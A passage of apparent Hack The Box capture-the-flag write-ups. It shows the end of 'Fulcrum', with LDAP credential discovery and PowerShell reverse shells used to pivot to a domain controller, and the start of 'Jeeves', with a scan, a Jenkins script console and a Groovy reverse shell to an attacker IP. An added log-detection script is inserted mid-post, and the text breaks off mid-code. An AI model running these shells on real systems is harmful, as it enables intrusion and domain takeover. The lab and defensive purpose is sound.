$dn = New-Object System.DirectoryServices.DirectoryEntry (&quot;LDAP://$($DomainControllerIpAddress):389/$LdapDn&quot;,$username,$password)
$ds = new-object System.DirectoryServices.DirectorySearcher($dn)
$ds.filter = &quot;((cn=bobby*))&quot;
$ds.SearchScope = &quot;subtree&quot;
$ds.PropertiesToLoad.Add(&quot;*&quot;)
$data = $ds.FindAll()
$data.Properties

Doing so gives us the following output…

Name Value
---- -----
logoncount {18}
codepage {0}
objectcategory {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
description {Has logon rights to the file server}
usnchanged {143447}
instancetype {4}
name {Bobby Tables}
badpasswordtime {131522885566857829}
pwdlastset {131514417841217344}
objectclass {top, person, organizationalPerson, user}
badpwdcount {0}
samaccounttype {805306368}
lastlogontimestamp {131556801131693417}
usncreated {12878}
objectguid {88 53 29 79 114 147 100 75 187 41 125 239 148 113 13 111}
info {Password set to ++FileServerLogon12345++}
whencreated {10/2/2017 6:06:57 PM}
adspath {LDAP://dc.fulcrum.local:389/CN=Bobby Tables,OU=People,DC=fulcrum,DC=local}
useraccountcontrol {66048}
cn {Bobby Tables}
countrycode {0}
primarygroupid {513}
whenchanged {11/20/2017 7:35:13 PM}
dscorepropagationdata {10/2/2017 6:09:28 PM, 10/2/2017 6:06:57 PM, 1/1/1601 12:00:00 AM}
lastlogon {131556801131693417}
distinguishedname {CN=Bobby Tables,OU=People,DC=fulcrum,DC=local}
samaccountname {BTables}
objectsid {1 5 0 0 0 0 0 5 21 0 0 0 70 111 187 188 76 255 138 170 168 71 215 161 80 4 0 0}
lastlogoff {0}
displayname {Bobby Tables}
accountexpires {9223372036854775807}
userprincipalname {BTables@fulcrum.local}

It seems we might have discovered Bobby Tables’ credentials in the “info” attribute, and from the “description” he should have logon rights to the file server (file.fulcrum.local).

Pivoting to file.fulcrum.local with Nishang

Trying to enter another PowerShell Remoting session gives us an error stating that we can’t do multi-hop PSRemoting sessions. Unfortunately we also don’t have permission to enable multi-hop PSRemoting (CredSSP), because we aren’t administrators.

[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; Enter-PSSession -Computername file.fulcrum.local -Credential fulcrum.local\btables
Enter-PSSession : You are currently in a Windows PowerShell PSSession and cannot use the Enter-PSSession cmdlet to enter another PSSession.
+ CategoryInfo : InvalidArgument: (:) [Enter-PSSession], ArgumentException
+ FullyQualifiedErrorId : RemoteHostDoesNotSupportPushRunspace,Microsoft.PowerShell.Commands.EnterPSSessionCommand
[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; Enable-WSManCredSSP –Role Client –DelegateComputer spoke
Access is denied. You need to run this cmdlet from an elevated process.
+ CategoryInfo : NotSpecified: (:) [Enable-WSManCredSSP], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.WSMan.Management.EnableWSManCredSSPCommand

We are able to call back out to the HTB VPN IP space, so we can use PowerShell’s Invoke-Command to execute commands on the box. We can get a reverse shell by copy-pasting Nishang’s Invoke-PowerShellTcpOneLine into the script block.

Invoke-Command on file.fulcrum.local:

Invoke-Command -ComputerName file.fulcrum.local -Credential fulcrum.local\btables -Port 5985 -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.15.74',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&amp;gt;&amp;amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&amp;gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }

Getting a shell:

root@dastinia:~# ncat -lnvp 53
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.10.10.62.
Ncat: Connection from 10.10.10.62:12873.
whoami
fulcrum\btables
PS C:\Users\BTables\Documents&amp;gt;

Getting the user flag:

PS C:\Users\BTables\Desktop&amp;gt; dir
Directory: C:\Users\BTables\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/4/2017 10:12 PM 34 user.txt
PS C:\Users\BTables\Desktop&amp;gt; type user.txt
...[snip]...

Pivoting to Domain Controller (dc.fulcrum.local)

Exploring the system, you discover a myriad of files, of which the contents of domain_users.csv appear to be a list of usernames and passwords for various domain users.

PS C:\Users\BTables&amp;gt; dir
Directory: C:\Users\BTables
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/4/2017 10:12 PM Desktop
d-r--- 10/9/2017 8:22 PM Documents
d-r--- 7/16/2016 2:18 PM Downloads
d-r--- 7/16/2016 2:18 PM Favorites
d-r--- 7/16/2016 2:18 PM Links
d-r--- 7/16/2016 2:18 PM Music
d-r--- 7/16/2016 2:18 PM Pictures
d----- 7/16/2016 2:18 PM Saved Games
d-r--- 7/16/2016 2:18 PM Videos
-a---- 10/12/2017 8:09 PM 5502 check-auth.ps1
-a---- 10/12/2017 7:48 PM 45011 domain_users.csv
-a---- 10/12/2017 7:21 PM 21002 file.txt
-a---- 10/12/2017 7:21 PM 21002 file2.txt
-a---- 10/12/2017 7:48 PM 45011 merged.txt
-a---- 10/12/2017 7:43 PM 90002 merged2.txt
-a---- 10/12/2017 7:39 PM 21002 Output.txt
-a---- 10/12/2017 7:23 PM 75002 pass.txt
-a---- 10/12/2017 7:23 PM 75002 pass2.txt
-a---- 10/12/2017 9:16 PM 21000 result.txt
-a---- 10/12/2017 9:04 PM 42 test.csv
-a---- 10/12/2017 7:14 PM 18002 users.txt
-a---- 10/12/2017 7:22 PM 0 wordlist.txt

Contents of “domain_users.csv”:

...[snip]...
a7e6,@fulcrum_e9f86a021507_$
9cea,@fulcrum_1eee5eabb089_$
9e92,@fulcrum_efecb22c5b82_$
8d25,@fulcrum_70e0e02bd594_$
9923,@fulcrum_17f672dfcc78_$
b0b6,@fulcrum_7a5f2af5237e_$
9e2a,@fulcrum_acd5008a3f9d_$
a700,@fulcrum_47ff4e46a43f_$
b473,@fulcrum_110bf7e71ecd_$
984a,@fulcrum_d254c73f8dab_$

I forgot to mention that from our earlier enumeration we could have discovered which users are Domain Admins by querying LDAP. I forgot to record the exact query I used, but to give a baseline idea of what the LDAP query structure would have looked like: (&amp;amp;(objectCategory=user)(memberOf=CN=Domain Admins,CN=People,DC=fulcrum,dc=local)). Either way, by brute-forcing the credentials with a script or by querying LDAP, you would discover that the user 923a is in the Domain Admins group.

PS C:\Users\BTables&amp;gt; type domain_users.csv | findstr &quot;923a&quot;
9f68,@fulcrum_df0923a7ca40_$
923a,@fulcrum_bf392748ef4e_$

Getting a shell on the domain controller dc.fulcrum.local:

Invoke-Command -ComputerName dc.fulcrum.local -Credential 923a -Port 5985 -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.15.74',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&amp;gt;&amp;amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&amp;gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }

root@dastinia:~# nc -lnvp 53
listening on [any] 53 ...
connect to [10.10.15.74] from (UNKNOWN) [10.10.10.62] 1559
PS C:\Users\923a\Documents&amp;gt; whoami
fulcrum\923a
PS C:\Users\923a\Documents&amp;gt;whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
FULCRUM\Domain Admins Group S-1-5-21-3166400326-2861236044-2715240360-512 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
FULCRUM\Denied RODC Password Replication Group Alias S-1-5-21-3166400326-2861236044-2715240360-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PS C:\Users\923a&amp;gt;

Box finally complete :)

PS C:\Users\Administrator\Desktop&amp;gt; type root.txt
...[snip]...</summary></entry><entry><title type="html">Hack the Box - Jeeves Write up</title><link href="https://dastinia.io/write-up/hackthebox/2018/05/19/hackthebox-jeeves-writeup/" rel="alternate" type="text/html" title="Hack the Box - Jeeves Write up" /><published>2018-05-19T00:00:00-04:00</published><updated>2018-05-19T00:00:00-04:00</updated><id>https://dastinia.io/write-up/hackthebox/2018/05/19/hackthebox-jeeves-writeup</id><content type="html" xml:base="https://dastinia.io/write-up/hackthebox/2018/05/19/hackthebox-jeeves-writeup/">&lt;h2 id=&quot;intro&quot;&gt;Intro&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/jeeves/1.png&quot; alt=&quot;&amp;quot;Jeeves&amp;quot;&quot; title=&quot;Jeeves&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I honestly had a whole lot of fun with Jeeves. It had multiple ways of attacking/rooting it, while also being a very &lt;em&gt;realistic&lt;/em&gt; example of something that you would see in the real world. It wasn’t an extremely difficult box, but you definitely had to do a little research to root it successfully. Definitely adding &lt;code class=&quot;highlighter-rouge&quot;&gt;Jeeves&lt;/code&gt; to my list of HTB favorites.&lt;/p&gt;

&lt;h2 id=&quot;tools-used&quot;&gt;Tools Used&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/&quot;&gt;Nmap&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Web Browser&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/ncat/&quot;&gt;Ncat&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project&quot;&gt;Dirbuster&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/rapid7/metasploit-framework&quot;&gt;Metasploit Framework&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Powershell&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/GDSSecurity/Windows-Exploit-Suggester&quot;&gt;GDSecurity Windows Privesc Suggester&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/byt3bl33d3r/CrackMapExec&quot;&gt;CrackMapExec&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://www.openwall.com/john/&quot;&gt;John the Ripper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;enumeration&quot;&gt;Enumeration&lt;/h2&gt;
&lt;h3 id=&quot;inital-scanning&quot;&gt;Initial Scanning&lt;/h3&gt;

&lt;p&gt;Like with every box, let’s start off with an nmap scan of &lt;code class=&quot;highlighter-rouge&quot;&gt;Jeeves&lt;/code&gt; (10.10.10.63)…&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/jeeves# nmap -T4 -sC -sV -n 10.10.10.63 -oA jeeves_initial_scan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-16 08:57 EDT
Nmap scan report for 10.10.10.63
Host is up (0.15s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2018-05-16 13:58:08
|_  start_date: 2018-05-16 11:17:53

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.30 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Small note: if you aren’t extremely familiar with Windows, you can usually tell which version of Windows is running from the version of &lt;a href=&quot;https://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions#Features&quot;&gt;IIS&lt;/a&gt; that’s being displayed. As you can see it’s &lt;code class=&quot;highlighter-rouge&quot;&gt;Microsoft IIS httpd 10.0&lt;/code&gt;, which means that this version of Windows is likely &lt;code class=&quot;highlighter-rouge&quot;&gt;Windows Server 2016&lt;/code&gt; or &lt;code class=&quot;highlighter-rouge&quot;&gt;Windows 10&lt;/code&gt;. It’s not 100% conclusive, but it gives you an idea of what you are working with.&lt;/p&gt;

&lt;p&gt;A full port scan was run in the background, but no additional ports/services were discovered.&lt;/p&gt;

&lt;h3 id=&quot;enumerating-port-80&quot;&gt;Enumerating Port 80&lt;/h3&gt;

&lt;p&gt;Visiting the webserver on port 80 gives us this throwback to the past: an &lt;code class=&quot;highlighter-rouge&quot;&gt;ask jeeves&lt;/code&gt; search engine webpage.
&lt;img src=&quot;https://dastinia.io/assets/images/htb/jeeves/2.png&quot; alt=&quot;Ask Jeeves Search Engine&quot; title=&quot;Ask Jeeves Search Engine&quot; /&gt;&lt;/p&gt;

&lt;p&gt;There’s a search bar, so I input all the special characters to see how the “application” parses them…&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/jeeves/3.png&quot; alt=&quot;Fake Error Page Image&quot; title=&quot;Fake Error Page Image&quot; /&gt;&lt;/p&gt;

&lt;p&gt;You are presented with the fake &lt;em&gt;“error page”&lt;/em&gt; above, which is just an image of an error page.&lt;/p&gt;

&lt;h3 id=&quot;enumerating-port-50000-jettyjenkins&quot;&gt;Enumerating Port 50000 (Jetty/Jenkins)&lt;/h3&gt;
&lt;p&gt;Visiting the application on port 50000 in a web browser leads us to a &lt;em&gt;Jetty 404 Error&lt;/em&gt; page.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/jeeves/4.png&quot; alt=&quot;Jetty Error Page&quot; title=&quot;Jetty Error Page&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Whenever I encounter an application error message that looks fairly unique, I always copy &amp;amp; paste the error message into Google and see what happens. This technique is very underrated, google that shit.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/jeeves/5.png&quot; alt=&quot;Google that Shit&quot; title=&quot;Google that Shit&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We are seeing quite a few results for Jenkins, so there is a high probability that this server is running Jenkins as a service, and now we just have to discover it.&lt;/p&gt;

&lt;h4 id=&quot;dirbuster&quot;&gt;Dirbuster&lt;/h4&gt;

&lt;p&gt;Next step is to dirbuster everything to discover the Jenkins dashboard path. For most HTB boxes I always use the &lt;code class=&quot;highlighter-rouge&quot;&gt;directory-list-2.3-medium.txt&lt;/code&gt; wordlist, which comes by default with Kali.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/jeeves/6.png&quot; alt=&quot;Dirbuster&quot; title=&quot;Dirbuster&quot; /&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Wed May 16 09:48:14 EDT 2018
--------------------------------

http://10.10.10.63:50000
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/askjeeves/
/askjeeves/people/
/askjeeves/about/
/askjeeves/log/
/askjeeves/computer/
/askjeeves/api/
/askjeeves/log/rss/
/askjeeves/api/xml/
/askjeeves/people/api/
/askjeeves/script/
/askjeeves/api/python/
/askjeeves/people/api/xml/
.... [TRUNCATED] ....
--------------------------------

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;It looks like &lt;code class=&quot;highlighter-rouge&quot;&gt;/askjeeves/&lt;/code&gt; is the correct path for the Jenkins main dashboard, confirming our suspicion that Jenkins is the running service.
&lt;img src=&quot;https://i.imgur.com/uC2bI92.png&quot; alt=&quot;Jenkins Dashboard&quot; title=&quot;Jenkins Dashboard&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;exploitation&quot;&gt;Exploitation&lt;/h2&gt;
&lt;h3 id=&quot;exploiting-jenkins&quot;&gt;Exploiting Jenkins&lt;/h3&gt;

&lt;p&gt;Jenkins is pretty much code execution as a service, so exploiting it shouldn’t be too much of a hassle. There are a few ways to shell this box, so I’ll try and cover the main paths. This particular Jenkins server didn’t require authentication to perform actions against it, which is a pretty big (but common) misconfiguration.&lt;/p&gt;
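A defender-side complement to this, added here and not part of the original write-up: the detection logic below runs over a constructed NCSA-format request log and flags POSTs to the Jenkins script console endpoints (critical when the auth-user field shows the request was anonymous) and any client producing a DirBuster-style flood of 404s. It assumes Jetty request logging is enabled in front of Jenkins, which is not the default, and all sample lines are made up.

```python
"""Spot script-console execution and directory brute-forcing in a Jenkins request log (added example)."""
import re
from collections import Counter

# NCSA-style request log line (assumption: Jetty/Jenkins request logging is enabled).
# Groups: client IP, auth user, timestamp, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) \S+')

# /script is the console page, /scriptText its form-POST API; both run arbitrary Groovy on the master.
SCRIPT_CONSOLE_RE = re.compile(r"/script(Text)?(/|\?|$)")


def parse_line(line):
    """Return a dict for one log line, or None if it is not in NCSA format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ip, user, ts, method, path, status = m.groups()
    return {"ip": ip, "user": user, "ts": ts, "method": method, "path": path, "status": int(status)}


def analyze(lines, notfound_threshold=50):
    """Return findings: POSTs to the script console (critical when anonymous) and 404 floods per client."""
    findings = []
    notfound_by_ip = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable lines are skipped, not treated as findings
        if rec["status"] == 404:
            notfound_by_ip[rec["ip"]] += 1
        if rec["method"] == "POST" and SCRIPT_CONSOLE_RE.search(rec["path"]):
            anonymous = rec["user"] == "-"  # no authenticated user: security is off or anonymous may run scripts
            findings.append({
                "kind": "script_console_exec",
                "ip": rec["ip"],
                "user": "anonymous" if anonymous else rec["user"],
                "path": rec["path"],
                "severity": "critical" if anonymous else "high",
            })
    for ip, n in notfound_by_ip.items():
        if n >= notfound_threshold:
            findings.append({"kind": "dir_bruteforce", "ip": ip, "count": n, "severity": "medium"})
    return findings


# Constructed sample log (not captured from the box): one normal visit, one authenticated scriptText call,
# one anonymous console POST, one unparsable line, and a DirBuster-style burst of 404s from one client.
SAMPLE_LOG = [
    '10.10.14.5 - - [16/May/2018:09:40:01 -0400] "GET /askjeeves/ HTTP/1.1" 200 9012 "-" "Mozilla/5.0"',
    '10.10.14.5 - admin [16/May/2018:09:41:10 -0400] "POST /askjeeves/scriptText HTTP/1.1" 200 16 "-" "curl/7.58.0"',
    '10.10.15.30 - - [16/May/2018:09:52:33 -0400] "POST /askjeeves/script HTTP/1.1" 200 4412 "-" "Mozilla/5.0"',
    "not a log line",
] + [
    f'10.10.15.30 - - [16/May/2018:09:48:{i % 60:02d} -0400] "GET /askjeeves/dir{i} HTTP/1.1" 404 1310 "-" "DirBuster-1.0-RC1"'
    for i in range(60)
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```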

&lt;h4 id=&quot;method-1-jenkins-script-console&quot;&gt;Method 1: Jenkins Script Console&lt;/h4&gt;

&lt;p&gt;Jenkins has a scripting console, which you can access by going to &lt;code class=&quot;highlighter-rouge&quot;&gt;Manage Jenkins&lt;/code&gt; =&amp;gt; &lt;code class=&quot;highlighter-rouge&quot;&gt;Script Console&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://i.imgur.com/xj7w5jO.png&quot; alt=&quot;Jenkins Script Console&quot; title=&quot;Jenkins Script Console&quot; /&gt;&lt;/p&gt;

&lt;p&gt;You can write scripts in the &lt;code class=&quot;highlighter-rouge&quot;&gt;Groovy Scripting Language&lt;/code&gt;. I searched for &lt;code class=&quot;highlighter-rouge&quot;&gt;groovy script run command example&lt;/code&gt;; if you just want to skip straight to the shell, search &lt;code class=&quot;highlighter-rouge&quot;&gt;groovy script reverse shell&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Testing to see if we have code execution…&lt;/p&gt;

&lt;div class=&quot;language-groovy highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;kt&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;sout&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;StringBuffer&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(),&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;serr&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;StringBuffer&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;()&lt;/span&gt;
&lt;span class=&quot;kt&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;proc&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'powershell.exe $PSVERSIONTABLE'&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;execute&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;()&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;proc&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;consumeProcessOutput&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;sout&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;serr&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;proc&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;waitForOrKill&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1000&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;println&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;out&amp;gt; $sout err&amp;gt; $serr&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;Output:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://i.imgur.com/1o04hYr.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We confirmed that we have code execution. Now let’s shell it.&lt;/p&gt;

&lt;p&gt;From my search of &lt;code class=&quot;highlighter-rouge&quot;&gt;groovy script reverse shell&lt;/code&gt;, I came across this &lt;a href=&quot;https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76&quot;&gt;Github gist&lt;/a&gt;
– change the &lt;code class=&quot;highlighter-rouge&quot;&gt;host&lt;/code&gt; and &lt;code class=&quot;highlighter-rouge&quot;&gt;port&lt;/code&gt; parameters to match your settings, hit “Run” in the script console, &amp;amp; you will get a reverse shell.&lt;/p&gt;

&lt;div class=&quot;language-groovy highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;n&quot;&gt;String&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;host&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;10.10.15.30&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;port&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;8282&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;String&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cmd&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;cmd.exe&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;Process&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;ProcessBuilder&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;cmd&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;).&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;redirectErrorStream&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;).&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;start&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;();&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;Socket&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;Socket&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;host&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;port&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;);&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;InputStream&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;pi&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;getInputStream&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(),&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;pe&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;getErrorStream&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(),&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;si&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span 
class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;getInputStream&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;();&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;OutputStream&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;po&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;getOutputStream&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(),&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;so&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;getOutputStream&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;();&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;while&lt;/span&gt;&lt;span 